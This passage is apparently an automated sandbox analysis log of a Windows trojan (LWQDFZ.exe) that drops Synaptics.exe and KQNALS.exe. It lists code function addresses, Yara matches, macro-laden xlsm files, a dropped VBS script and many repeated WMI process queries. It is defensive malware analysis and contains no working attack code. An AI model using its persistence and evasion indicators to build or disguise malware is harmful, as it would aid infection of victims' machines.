                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_003E82D0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_006B82D0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_004030AD2_2_004030AD
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003B36802_2_003B3680
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003ADCD02_2_003ADCD0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003AA0C02_2_003AA0C0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C01832_2_003C0183
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E220C2_2_003E220C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A85302_2_003A8530
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A66702_2_003A6670
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C06772_2_003C0677
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D87792_2_003D8779
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040A8DC2_2_0040A8DC
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C0A8F2_2_003C0A8F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A6BBC2_2_003A6BBC
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A8CA02_2_003A8CA0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003CAC832_2_003CAC83
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BAD5C2_2_003BAD5C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D4EBF2_2_003D4EBF
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C0EC42_2_003C0EC4
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D113E2_2_003D113E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C12F92_2_003C12F9
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D542F2_2_003D542F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F5D02_2_0040F5D0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D599F2_2_003D599F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003CDA742_2_003CDA74
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A5D322_2_003A5D32
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003CBDF62_2_003CBDF6
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003ABDF02_2_003ABDF0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C1E5A2_2_003C1E5A
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003CDF692_2_003CDF69
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EBFB82_2_003EBFB8
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D7FFD2_2_003D7FFD
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_00783A1D3_2_00783A1D
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0067DCD09_2_0067DCD0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0067A0C09_2_0067A0C0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006901839_2_00690183
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B220C9_2_006B220C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006785309_2_00678530
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006766709_2_00676670
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006906779_2_00690677
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006A87799_2_006A8779
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DA8DC9_2_006DA8DC
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00690A8F9_2_00690A8F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00676BBC9_2_00676BBC
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00678CA09_2_00678CA0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0069AC839_2_0069AC83
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068AD5C9_2_0068AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00690EC49_2_00690EC4
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006A4EBF9_2_006A4EBF
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006D30AD9_2_006D30AD
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006A113E9_2_006A113E
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006912F99_2_006912F9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006A542F9_2_006A542F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF5D09_2_006DF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006836809_2_00683680
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006A599F9_2_006A599F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0069DA749_2_0069DA74
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00675D329_2_00675D32
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0067BDF09_2_0067BDF0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0069BDF69_2_0069BDF6
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00691E5A9_2_00691E5A
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0069DF699_2_0069DF69
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006A7FFD9_2_006A7FFD
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BBFB89_2_006BBFB8
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: String function: 0068F885 appears 68 times
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: String function: 00697750 appears 42 times
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: String function: 003BF885 appears 68 times
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: String function: 003C7750 appears 42 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448
                              Source: LWQDFZ.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: LWQDFZ.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCXFBD9.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: LWQDFZ.exe, 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs LWQDFZ.exe
                              Source: LWQDFZ.exe, 00000000.00000003.1398521267.00000000005F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameV vs LWQDFZ.exe
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs LWQDFZ.exe
                              Source: LWQDFZ.exe, 00000000.00000000.1390466134.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs LWQDFZ.exe
                              Source: LWQDFZ.exe, 00000000.00000003.1398521267.00000000005EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs LWQDFZ.exe
                              Source: LWQDFZ.exe, 00000000.00000003.1398521267.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName"\Z vs LWQDFZ.exe
                              Source: LWQDFZ.exe, 00000000.00000003.1398521267.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs LWQDFZ.exe
                              Source: LWQDFZ.exeBinary or memory string: OriginalFileName vs LWQDFZ.exe
                              Source: LWQDFZ.exeBinary or memory string: OriginalFilenameb! vs LWQDFZ.exe
                              Source: LWQDFZ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@22/80@11/4
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003ED712 GetLastError,FormatMessageW,2_2_003ED712
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DB8B0 AdjustTokenPrivileges,CloseHandle,2_2_003DB8B0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_003DBEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006AB8B0 AdjustTokenPrivileges,CloseHandle,9_2_006AB8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_006ABEC3
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_003EEA85
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_003E6F5B
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_003EEFCD
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_003A31F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\Users\user\Desktop\._cache_LWQDFZ.exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7464
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeFile created: C:\Users\user\AppData\Local\Temp\MHDFGY.vbsJump to behavior
                              Source: Yara matchFile source: LWQDFZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.LWQDFZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXFBD9.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs
                              Source: C:\Users\user\Desktop\LWQDFZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
